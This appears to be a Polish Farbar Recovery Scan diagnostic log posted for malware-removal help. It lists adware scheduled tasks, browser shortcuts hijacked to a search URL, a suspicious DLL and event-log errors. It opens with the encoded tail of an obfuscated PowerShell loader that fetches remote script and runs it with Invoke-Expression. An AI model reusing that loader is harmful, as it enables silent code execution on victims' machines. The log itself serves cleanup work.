qAGUAYwB0ACAASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAkAGIAdAAsADIALAAoACQAYgB0AC4ATABlAG4AZwB0AGgALQAkAGUAeAB0ACkAKQApACwAWwBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUAYwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsAfQAKACQAcwBjAD0AZABzAHQAcgAoAHcAYwAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA== Task: {9B7AA799-FC5C-4F2C-AC2C-B3CBD0070D62} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.) Task: {A27432DF-1B61-4ECE-99AB-ACB6D30AED91} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-02-19] (Piriform Ltd) Task: {BEE6820B-A5D5-45E6-AB6A-D5A4331B3475} - System32\Tasks\{B399420A-560F-4B7C-B3BD-F85BA49AEDAE} => Firefox.exe hxxp://ui.skype.com/ui/0/6.3.73.105.456/pl/abandoninstall?page=tsProgressBar Task: {C1C71FE9-F10E-4D9C-A5B7-ED922E21FB3A} - System32\Tasks\{9CFB0D6C-72B7-4916-92F8-2A43298E80F1} => pcalua.exe -a E:\DATA\Install.exe -d E:\DATA Task: {C9D3D442-C08E-44F0-B911-BDF640545C20} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2016-01-20] (AVAST Software) Task: {D7C0029C-1B7F-40A9-827E-8E6A1A46B1DC} - System32\Tasks\Price Fountain => C:\Users\Admin\AppData\Roaming\PriceFountain\UpdateProc\UpdateTask.exe [2016-01-28] () <==== UWAGA Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc Task: {EFD6A333-8422-413F-8799-6729E70121BE} - System32\Tasks\System Healer Task => C:\Program Files (x86)\SystemHealer\RescueMonitor.exe [2016-01-18] () Task: {F988A5E4-06EB-44F6-94CB-F946CD5678B8} - System32\Tasks\{E993273D-4EFE-4CEA-BCED-7F3E95AB859E} => Firefox.exe hxxp://ui.skype.com/ui/0/6.6.0.106/pl/abandoninstall?page=tsMain (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\Price Fountain.job => C:\Users\Admin\AppData\Roaming\PRICEF~1\UPDATE~1\UPDATE~1.EXE <==== UWAGA Task: C:\Windows\Tasks\System HealerPeriod.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe Task: C:\Windows\Tasks\System HealerStartUp.job => C:\Program Files (x86)\SystemHealer\SystemHealer.exe ==================== Skróty ============================= (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ShortcutWithArgument: C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Opera.lnk -> C:\Program Files (x86)\Opera\launcher.exe (Opera Software) -> hxxp://www.yoursites123.com/?type=sc&ts=1452253355&z=8f6443bb6331334243727aag5zfw8odofw9c4c7wco&from=wpm01073&uid=WDCXWD3200BPVT-22JJ5T0_WD-WXF1E81UYJL6UYJL6 ==================== Załadowane moduły (filtrowane) ============== 2015-02-19 22:40 - 2015-02-19 22:40 - 00057344 _____ () C:\Program Files\CCleaner\lang\lang-1045.dll 2016-01-20 13:59 - 2016-01-20 13:58 - 61568120 _____ () C:\Program Files (x86)\Opera\34.0.2036.50\opera.dll 2016-01-20 13:59 - 2016-01-20 13:57 - 01983096 _____ () C:\Program Files (x86)\Opera\34.0.2036.50\libglesv2.dll 2016-01-20 13:59 - 2016-01-20 13:57 - 00081528 _____ () C:\Program Files (x86)\Opera\34.0.2036.50\libegl.dll 2016-01-28 12:45 - 2016-01-28 12:45 - 00349184 _____ () C:\Users\Admin\AppData\Local\ShipkeeperXenoliths\YardingConservatively.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== EXE - Powiązania (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: =============================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2009-06-10 22:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1157007284-3841837932-3106168173-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.1.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == (Obecnie brak automatycznej naprawy dla tej sekcji.) ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [{706E61E2-3DC0-430A-8E0C-04537D1C0602}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [TCP Query User{5133E34E-7537-4EB5-97A9-E2AAA1D33D87}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe FirewallRules: [UDP Query User{976E357F-96B5-44F4-960B-90A9C94D3293}C:\program files (x86)\ares\ares.exe] => (Allow) C:\program files (x86)\ares\ares.exe FirewallRules: [TCP Query User{9251FB54-E410-4CDE-B826-FB9A468EA163}C:\program files (x86)\ares\ares.exe] => (Block) C:\program files (x86)\ares\ares.exe FirewallRules: [UDP Query User{8F228E56-646D-4456-A361-E3BF6A389AA8}C:\program files (x86)\ares\ares.exe] => (Block) C:\program files (x86)\ares\ares.exe FirewallRules: [TCP Query User{A2C86416-12BE-462D-AC0F-BD7D341F3A0D}E:\easysetupassistant\easysetupassistant.exe] => (Allow) E:\easysetupassistant\easysetupassistant.exe FirewallRules: [UDP Query User{6179ECB5-1C5B-471F-9C30-BBAF55F3D210}E:\easysetupassistant\easysetupassistant.exe] => (Allow) E:\easysetupassistant\easysetupassistant.exe FirewallRules: [{79C52234-C6FD-4F26-9975-C35CF8B5981C}] => (Block) E:\easysetupassistant\easysetupassistant.exe FirewallRules: [{6B53F2F9-868E-4057-9AC2-AE1C0452C922}] => (Block) E:\easysetupassistant\easysetupassistant.exe FirewallRules: [{AC16094F-7B54-4625-B503-61C9E910EA89}] => (Allow) C:\Users\Admin\AppData\Local\Temp\7zS71A8\HPDiagnosticCoreUI.exe FirewallRules: [{FA766F4C-7B16-4322-AC13-0908BE6A44DD}] => (Allow) C:\Users\Admin\AppData\Local\Temp\7zS71A8\HPDiagnosticCoreUI.exe FirewallRules: [{779AAC3D-97E1-4BAD-9083-1650561018A4}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetup.exe FirewallRules: [{BE333E72-F2C3-4B79-94B2-BF30B38D93D7}] => (Allow) LPort=5357 FirewallRules: [{0077350A-CDD5-4D83-B11D-3DE8E2A2E4E8}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\HPNetworkCommunicatorCom.exe FirewallRules: [{935BCCCC-B761-4E3E-AFBB-66996C818A91}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetupLauncher.exe FirewallRules: [{8076DED7-B5C7-4F94-BCD4-72F3962C21C5}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetupLauncher.exe FirewallRules: [{5C602FED-8AB3-47B5-AF88-38ACB79F1849}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetupLauncher.exe FirewallRules: [{32D1385C-FD92-4E62-96E7-A1417A159E7E}] => (Allow) C:\Program Files\HP\HP Deskjet 2540 series\Bin\DeviceSetupLauncher.exe FirewallRules: [{5516C810-0836-43EC-B7A4-3A96FF73F1EE}] => (Allow) C:\Users\Admin\AppData\Local\Temp\7zS7B98\HPDiagnosticCoreUI.exe FirewallRules: [{1A4F51BC-E486-43AF-95ED-7A2B92099994}] => (Allow) C:\Users\Admin\AppData\Local\Temp\7zS7B98\HPDiagnosticCoreUI.exe FirewallRules: [{45FED27B-C24D-4ADB-BDC2-017B2C860D39}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Punkty Przywracania systemu ========================= 20-01-2016 13:08:14 Operacja przywracania 28-01-2016 10:22:23 Zaplanowany punkt kontrolny 28-01-2016 11:33:35 Operacja przywracania ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (01/28/2016 11:37:57 AM) (Source: System Restore) (EventID: 8210) (User: ) Description: Wystąpił nieokreślony błąd podczas przywracania systemu: (Zaplanowany punkt kontrolny). Informacje dodatkowe: 0x80070005. Error: (01/25/2016 10:51:35 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Nie można odnaleźć zestawu zależnego Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/25/2016 10:08:11 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Nie można odnaleźć zestawu zależnego Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/25/2016 09:59:54 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: ZARZĄDZANIE NT) Description: Nie można usunąć z pamięci ciągów licznika wydajności dla usługi WmiApRpl (WmiApRpl). Pierwszy wpis DWORD w sekcji danych (Data) zawiera kod błędu. Error: (01/25/2016 09:59:54 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT) Description: Ciągi wydajności w wartości rejestru wydajności są uszkodzone, kiedy proces wykonuje następującą operację na dostawcy licznika rozszerzeń: Performance. Wartość BaseIndex z rejestru wydajności to pierwszy wpis DWORD w sekcji danych Data, wartość LastCounter to drugi wpis DWORD, a wartość LastHelp to trzeci wpis DWORD w sekcji Data. Error: (01/25/2016 09:59:54 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: ZARZĄDZANIE NT) Description: Ciągi wydajności w wartości rejestru wydajności są uszkodzone, kiedy proces wykonuje następującą operację na dostawcy licznika rozszerzeń: Performance. Wartość BaseIndex z rejestru wydajności to pierwszy wpis DWORD w sekcji danych Data, wartość LastCounter to drugi wpis DWORD, a wartość LastHelp to trzeci wpis DWORD w sekcji Data. Error: (01/21/2016 01:46:33 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Nie można odnaleźć zestawu zależnego Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/21/2016 12:17:31 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Nie można odnaleźć zestawu zależnego Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/21/2016 12:17:11 AM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Nie można odnaleźć zestawu zależnego Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Error: (01/20/2016 04:35:13 PM) (Source: SideBySide) (EventID: 33) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla "Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"1". Nie można odnaleźć zestawu zależnego Microsoft.VC80.MFC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0". Użyj narzędzia sxstrace.exe, aby uzyskać szczegółową diagnozę. Dziennik System: ============= Error: (01/28/2016 12:46:30 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa WinZiper service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (01/28/2016 12:25:57 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: {E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} Error: (01/28/2016 12:03:20 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Avast Antivirus niespodziewanie zakończyła pracę. Wystąpiło to razy: 3. Error: (01/28/2016 12:02:49 PM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Avast Antivirus niespodziewanie zakończyła pracę. Wystąpiło to razy: 2. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (01/28/2016 12:02:17 PM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Host urządzenia UPnP zależy od usługi Odnajdywanie SSDP, której nie można uruchomić z powodu następującego błędu: %%1070 Error: (01/28/2016 12:02:17 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa Odnajdywanie SSDP zawiesiła się podczas uruchamiania. Error: (01/28/2016 11:59:42 AM) (Source: Service Control Manager) (EventID: 7031) (User: ) Description: Usługa Avast Antivirus niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 5000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie. Error: (01/28/2016 11:59:42 AM) (Source: Service Control Manager) (EventID: 7001) (User: ) Description: Usługa Host urządzenia UPnP zależy od usługi Odnajdywanie SSDP, której nie można uruchomić z powodu następującego błędu: %%1070 Error: (01/28/2016 11:59:42 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa Odnajdywanie SSDP zawiesiła się podczas uruchamiania. Error: (01/28/2016 11:57:51 AM) (Source: WMPNetworkSvc) (EventID: 14332) (User: ) Description: WMPNetworkSvc0x80004005 ==================== Statystyki pamięci =========================== Procesor: AMD E-450 APU with Radeon(tm) HD Graphics Procent pamięci w użyciu: 59% Całkowita pamięć fizyczna: 1770.9 MB Dostępna pamięć fizyczna: 714.19 MB Całkowita pamięć wirtualna: 3541.8 MB Dostępna pamięć wirtualna: 2160.41 MB ==================== Dyski ================================ Drive c: () (Fixed) (Total:100.05 GB) (Free:69.77 GB) NTFS Drive d: () (Fixed) (Total:197.94 GB) (Free:164.84 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or 8) (Size: 298.1 GB) (Disk ID: F02AC4E2) Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=100 GB) - (Type=07 NTFS) Partition 3: (Not Active) - (Size=197.9 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================